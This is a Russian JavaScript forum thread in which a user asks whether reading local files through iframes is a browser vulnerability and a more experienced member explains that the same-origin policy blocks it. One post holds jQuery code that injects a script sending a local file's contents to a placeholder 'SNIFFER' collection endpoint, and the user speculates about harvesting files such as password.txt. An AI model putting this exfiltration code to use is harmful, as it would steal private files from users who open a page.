Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 01.01.2017, 14:16
Интересующийся
Отправить личное сообщение для kingofparty Посмотреть профиль Найти все сообщения от kingofparty
 
Регистрация: 24.11.2016
Сообщений: 11

чтение локального файла и отправка на гейт. бага?
Приветствую. Пытаюсь получить тело #frm1

var body1 = $("#frm1").contents().find("body").html();
console.log(body1); //undefined


Файл 1.txt лежит рядом.

<iframe id="frm1" width="500px" height="500px" src="file:///D:\html\1.txt"></iframe>


Не получается из за политики безопасности?
Ок. Что если внутрь тела frm1 добавить JS код который будет создавать еще один iframe и отправлять тело документа (из созданного iframe'a)

$( document ).ready(function() {
	    
    var $iframe = $('#frm1');
    $iframe.ready(function() {
	    
	    var script = 'var body=document.body.innerHTML; var ifrm = document.createElement("iframe"); ifrm.setAttribute("src", "http://SNIFFER/ss.php?data="+ body); ifrm.style.width = "4px"; ifrm.style.height = "4px"; document.body.appendChild(ifrm);';
        $iframe.contents().find("body").append($('<script>').html(script));
    
	});
    

	
	});


На удивление - работает.
Повторюсь файлы .html и 1.txt лежат в одной директории (из других директорий выводит, но не отправляет, в console.log тоже не выводит, не знаю почему. Работает только с .txt)
Что если злоумышленник будет перебирать пути (как вариант password.txt) и отправлять себе. Достаточно будет только запустить .html файл

Последний раз редактировалось kingofparty, 01.01.2017 в 14:19.
Ответить с цитированием
  #2 (permalink)  
Старый 01.01.2017, 15:40
Интересующийся
Отправить личное сообщение для kingofparty Посмотреть профиль Найти все сообщения от kingofparty
 
Регистрация: 24.11.2016
Сообщений: 11

Гейт в моем случае php скрипт который сохраняет значение переменной data (get)
Ответить с цитированием
  #3 (permalink)  
Старый 01.01.2017, 16:01
Интересующийся
Отправить личное сообщение для kingofparty Посмотреть профиль Найти все сообщения от kingofparty
 
Регистрация: 24.11.2016
Сообщений: 11

да нет вопросов. можно это считать за уязвимость?)
Ответить с цитированием
  #4 (permalink)  
Старый 01.01.2017, 16:23
Интересующийся
Отправить личное сообщение для kingofparty Посмотреть профиль Найти все сообщения от kingofparty
 
Регистрация: 24.11.2016
Сообщений: 11

$( document ).ready(function() {
	    
   var $iframe = $('#frm1');
   $iframe.ready(function() {

	 var body = $iframe.contents().find("body").html();
	 
     console.log(body);
    
	});

	});


<body>
<iframe id="frm1" width="500px" height="500px" src="file:///D:/html/1.txt"></iframe>
</body>


в переменную body подгружается тело файла 1.txt. Работает если только файл лежит рядом с .html файлом откуда идет запуск js скрипта. Почему не удается получить тело другого удаленного локального .txt файл не понятно.

Последний раз редактировалось kingofparty, 01.01.2017 в 16:27.
Ответить с цитированием
  #5 (permalink)  
Старый 01.01.2017, 16:32
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Сообщение от kingofparty
Почему не удается получить тело другого удаленного локального .txt файл не понятно.
Потому, что это и есть уязвимость.
Ответить с цитированием
  #6 (permalink)  
Старый 01.01.2017, 16:48
Интересующийся
Отправить личное сообщение для kingofparty Посмотреть профиль Найти все сообщения от kingofparty
 
Регистрация: 24.11.2016
Сообщений: 11

Сообщение от laimas Посмотреть сообщение
Потому, что это и есть уязвимость.
не понял. тут уже срабатывает политика без-и?
Ответить с цитированием
  #7 (permalink)  
Старый 01.01.2017, 16:51
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Если бы клиент разрешал загружать любой локальный файл по любому произвольному адресу на клиенте, то чтобы чаще всего загружали?
Ответить с цитированием
  #8 (permalink)  
Старый 01.01.2017, 16:59
Интересующийся
Отправить личное сообщение для kingofparty Посмотреть профиль Найти все сообщения от kingofparty
 
Регистрация: 24.11.2016
Сообщений: 11

Сообщение от laimas Посмотреть сообщение
Если бы клиент разрешал загружать любой локальный файл по любому произвольному адресу на клиенте, то чтобы чаще всего загружали?
password я думаю и тп.

спасибо. думал уязвимость была)
Ответить с цитированием
  #9 (permalink)  
Старый 01.01.2017, 17:09
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Сообщение от kingofparty
password я думаю и тп.
Надо быть наивным, хранить файлы с такими именами. Если бы была возможность, то первый кандидат, это файл реестра, далее файлы браузеров и прочих лакомств.

А вообще, если для себя, то полезно забыть о браузере и писать ПО локальное.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Чтение данных из файла в массив TheSingleElk Общие вопросы Javascript 2 16.06.2016 01:09
File API Чтение и обработка локального файла Uncle_Co Events/DOM/Window 0 31.12.2014 18:01
Отправка файла с фиксированым местоположением по нажатию кнопки greencard AJAX и COMET 16 17.07.2013 15:22
Чтение из тектового файла Jackky Общие вопросы Javascript 14 30.06.2012 01:00
Отправка локального файла JIEXA AJAX и COMET 9 07.02.2010 18:18